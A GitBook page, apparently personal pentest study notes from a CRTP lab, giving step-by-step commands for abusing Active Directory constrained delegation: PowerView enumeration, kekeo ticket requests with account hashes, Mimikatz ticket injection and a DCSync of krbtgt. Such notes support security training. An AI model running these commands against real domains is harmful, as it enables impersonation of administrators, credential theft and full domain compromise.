👽
ALi3nW3rX
  • 👽ALi3NW3RX - Home Page
  • 🧧Resources
  • MITRE ATT&CK
  • Cyber Kill Chain
  • Education
    • ⚪Training Platforms
      • Attack & Defense
      • Hack The Box
      • Hack The Box Academy
      • Pentester Academy
      • Pentester Lab
      • PortSwigger Academy
      • Proving Grounds (PGP)
      • PwnTillDawn
      • Try Hack Me
    • 🟣Courses
      • Free Courses
        • API Penetration Testing Course
      • Paid Courses
        • OSCP
        • Pentester Academy
          • CRTP
            • CRTP Step By Step In Objectives
              • Obj 1 Enumeration
              • Obj 2 Enumeration
              • Obj 3 Enumeration
              • Obj 4 Enumeration
              • Obj 5 Local Priv Esc
              • Obj 6 BloodHound
              • Obj 7 Derivative Local Admin
              • Obj 8 Golden Ticket / DCSync
              • Obj 9 Silver Ticket for Host
              • Obj 10 Skeleton Key
              • Obj 11 DSRM
              • Obj 12 DCSync
              • Obj 13 Security Descriptors
              • Obj 14 Kerberoast Pass Crack
              • Obj 15 Unconstrained Delegation
            • CRTP Diagrams
          • CRTE
        • Hack The Box
          • CPTS
            • Common Terms (Cheat Sheet)
            • OWASP Top 10 2021
            • ACTIVE DIRECTORY ENUMERATION & ATTACKS
              • Enum Cheat Sheet
              • Tools of The Trade
              • Initial Enumeration of the Domain
              • LLMNR/NBT-NS Poisoning - from Linux
              • LLMNR/NBT-NS Poisoning - from Windows
              • Password Spraying Overview
              • Enumerating & Retrieving Password Policies
              • Password Spraying - Making a Target User List
              • Page 4
              • Page 3
              • Page 1
            • Page 2
  • Reverse Shells
    • revshells.com
  • C2
    • 🔴Cobalt Strike
      • Articles & Instructions
      • Resources
        • CS Cheat Sheet
        • Command Reference
        • Aggressor Scripts
        • RedTeam-OffensiveSecurity
      • Videos
  • WINDOWS
    • Active Directory Attack Map
    • Wadcoms
    • 🟢Recon
    • 🟢Enumeration
      • No Credentials
      • PowerView Enumeration
        • WMI
        • Domain Enumeration
        • Domain Trusts
        • Users
          • Find Local Admin Access
          • Find Active Sessions
        • Groups
        • Computers
        • Shares
        • GPO's
        • OU's
        • ACL's
      • Valid Credentials
    • 🟡FootHold
    • 🟡Local Priv Esc
      • PowerUp
      • ByPasses
      • Local Privilege Escalation
        • Local Priv Esc Using PowerUp.ps1
      • DSRM
    • 🟠Credential Harvesting
      • Dump NTDS.dit
    • 🟠Post Exploitation
    • 🟠Persistence
    • 🔴Domain Priv Esc
      • Domain Privilege Escalation
        • Enterprise Admins
        • DNS Admins
        • Constrained Delegation
        • Unconstrained Delegation
        • Set SPN
        • AS-REPS Roasting
        • Kerberoast
    • 🔴Lateral Movement & Pivoting
      • Lateral Movement
      • PowerShell Remoting
      • Reverse Shells
      • Pass The Hash
      • Over Pass The Hash
    • 🔴Attacks
      • DCSync
      • ACL
      • DSRM
      • AdminSDHolder
      • Print Nightmare
    • 🔴Forests & Trusts
      • Cross Forest Attacks
    • 🔵Defense & Hardening
    • 🔧Tools
      • BloodHound
      • Certipy
      • Commando-VM
      • CrackMapExec
        • CME Quick Reference
        • Protocols
          • SSH
            • Password Spraying
            • Authentication
            • Command Execution
          • MSSQL
            • Password Spraying
            • Authentication
            • Privesc
            • Command Execution
            • Upload/Download
            • Windows Commands
          • LDAP
            • Authentication
            • ASREPRoast
            • Find Domain SID
            • Kerberoasting
            • Unconstrained delegation
            • Admin Count
            • Machine Account Quota
            • Get user descriptions
            • Dump GMSA
            • Exploit ESC8 (ADCS)
            • Extract Subnet
            • LDAP Signing
            • Read DACL rights
          • FTP
            • Password Spraying
          • WINRM
            • Password Spraying
            • Authentication
            • Command Execution
            • LAPS
          • RDP
            • Password Spraying
            • Screenshot (Connected)
            • Screenshot (Not Connected)
        • Using Kerberos
        • Using Modules
        • Using The Database
        • BloodHound Integration
        • Scan for Vulnerabilities
        • Enumeration
          • Hosts
          • Null Sessions
          • Anonymous Login
          • Active Sessions
          • Shares and Access
          • Disks
          • Logged on Users
          • Domain Users
          • Users BruteForce RID
          • Domain Groups
          • Local Groups
          • Password Policy
          • SMB Signing NOT Required
        • Password Spraying
        • Authentication
          • Checking Domain Credentials
          • Checking Local Credentials
        • Command Execution
          • Remote Command Execution
          • Shells
        • Spidering Shares
        • Get and Put Files
        • Obtaining Credentials
          • Dump SAM
          • Dump LSA
          • Dump NTDS.dit
          • Dump LSASS
          • Dump WIFI Password
          • Dump KeyPass
        • LAPS
        • Spooler / WebDAV
        • MS Teams Cookies
      • Forensia
      • Inveigh
      • LaZagne
      • Ligolo / SSH Tunneling
      • LinWinPwn
      • MimiKatz.ps1
        • Golden Ticket
        • Silver Ticket
        • Skeleton Key
      • Rubeus
      • SharpCollection
      • SQLRecon
    • ✍️Scripts
      • FilelessNTDllReflection
      • FilelessRemotePE
      • ExecRemoteAssembly
  • Offensive Programming
    • RUST
      • Links
  • LINUX
    • Linux Terminal Commands
      • Git Cheat Sheet
      • Grep Cheat Sheet
    • Path to Root
    • Bash Cheat Sheet
    • Priv Esc
      • LD_Preload / SETENV
  • WEB APPS
    • Web Apps
      • LFI
      • XXE
  • DATABASES
    • Mysql
    • Postgresql
    • Redis
  • Common Tools & Commands
    • Protocols
      • FTP
      • RDP
      • SMB
      • SSH
    • Primary Tools
      • Hashcat
      • Responder
      • SQLMap
      • Chisel
      • CURL
      • XFREERDP
      • SSH
      • GOBUSTER
      • SNMP
      • NMAP
      • SMBCLIENT
      • WHATWEB
    • Editors
      • VIM
    • Misc Tools
      • ChatGPT
  • NETWORKING
    • Subnetting Cheat Sheet
  • SCRIPTS
    • Enum Scripts
  • MISC
    • Programming
      • GO
        • GoLangBot.Com
        • Ping Sweeper
      • NIM
    • Temp - Notes
Powered by GitBook
On this page
  • Constrained delegation User
  • Constrained delegation Computer
  1. WINDOWS
  2. Domain Priv Esc
  3. Domain Privilege Escalation

Constrained Delegation

Enumerate

Enumerate users with constrained delegation enabled

Get-DomainUser -TrustedToAuth
Get-DomainUser -TrustedToAuth | select samaccountname, msds-allowedtodelegateto

Enumerate computers with constrained delegation enabled

Get-Domaincomputer -TrustedToAuth
Get-Domaincomputer -TrustedToAuth | select samaccountname, msds-allowedtodelegateto

Constrained delegation User

Requesting TGT with kekeo

./kekeo.exe
Tgt::ask /user:<username> /domain:<domain> /rc4:<hash>

Requesting TGS with kekeo

Tgs::s4u /tgt:<tgt> /user:Administrator@<domain> /service:cifs/dcorp-mssql.dollarcorp.moneycorp.local

Use Mimikatz to inject the TGS ticket

Invoke-Mimikatz -Command '"kerberos::ptt <kirbi file>"'

Constrained delegation Computer

Requesting TGT with a PC hash

./kekeo.exe
Tgt::ask /user:dcorp-adminsrv$ /domain:<domain> /rc4:<hash>

Requesting TGS

No validation for the SPN specified

Tgs::s4u /tgt:<kirbi file> /user:Administrator@<domain> /service:time/dcorp-dc.dollarcorp.moneycorp.LOCAL|ldap/dcorp-dc.dollarcorp.moneycorp.LOCAL

Using mimikatz to inject TGS ticket and executing DCsync

Invoke-Mimikatz -Command '"Kerberos::ptt <kirbi file>"'
Invoke-Mimikatz -Command '"lsadump::dcsync /user:<shortdomain>\krbtgt"'
PreviousDNS AdminsNextUnconstrained Delegation

Last updated 2 years ago

🔴